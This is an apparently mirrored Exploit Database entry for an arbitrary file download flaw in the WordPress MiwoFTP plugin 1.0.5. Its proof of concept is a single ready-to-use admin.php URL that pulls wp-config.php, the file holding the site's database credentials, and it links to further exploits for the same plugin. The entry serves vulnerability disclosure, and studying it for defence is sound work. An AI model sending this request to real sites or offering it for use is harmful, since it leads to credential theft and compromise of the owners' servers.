WordPress Plugin MiwoFTP 1.0.5 – Arbitrary File Download (1)

• Exploit Database
• 18 阅读

• 作者： Necmettin COSKUN
  日期： 2015-04-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36774/

• # Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
  # Vendor			:Miwisoft LLC
  # Vendor Homepage :http://www.miwisoft.com
  # Version			:1.0.5
  # Tested on :Win7/Chrome/Firefox
  # Exploit Author:Necmettin COSKUN =>@babayarisi
  # Discovery date:04/15/2015
  
  
  MiwoFTP is a file manager plugin for WordPress.
  
  
  Description
  ================
  Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.
  
  Poc Exploit
  ================
   http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
  
  ================
  #RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
  
  #http://www.exploit-db.com/exploits/36763/
  #http://www.exploit-db.com/exploits/36762/
  #http://www.exploit-db.com/exploits/36761/
  ================
  
  Discovered by:
  ================
  Necmettin COSKUN|GrisapkaGuvenlikGrubu|4ewa2getha!